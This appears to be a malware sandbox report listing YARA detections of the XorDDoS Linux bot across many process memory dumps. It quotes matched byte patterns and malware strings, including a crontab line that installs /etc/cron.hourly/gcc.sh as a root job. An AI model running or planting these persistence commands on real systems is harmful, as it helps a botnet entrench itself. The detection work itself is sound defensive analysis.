6369.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6369.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6369.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6369.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6333.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6333.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6333.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6333.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6331.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6331.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6331.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6331.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6496.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6496.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6496.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6496.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6422.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6422.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6422.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6422.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6498.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6498.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6498.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6498.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6510.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6510.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6510.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6510.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6338.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6338.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6338.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6338.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6367.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6367.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6367.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6367.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6364.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6364.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6364.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6364.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6440.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6440.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6440.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6440.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6301.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6301.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6301.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6301.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6410.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6410.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6410.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6410.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6322.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6322.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6322.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6322.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6417.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6417.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6417.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6417.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6576.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6576.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6576.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6576.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6388.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6388.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6388.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6388.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6491.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6491.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6491.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6491.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6263.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6263.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6263.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6263.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6579.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6579.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6579.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6579.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6508.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6508.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6508.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6508.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6530.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6530.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6530.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6530.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6533.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6533.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6533.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
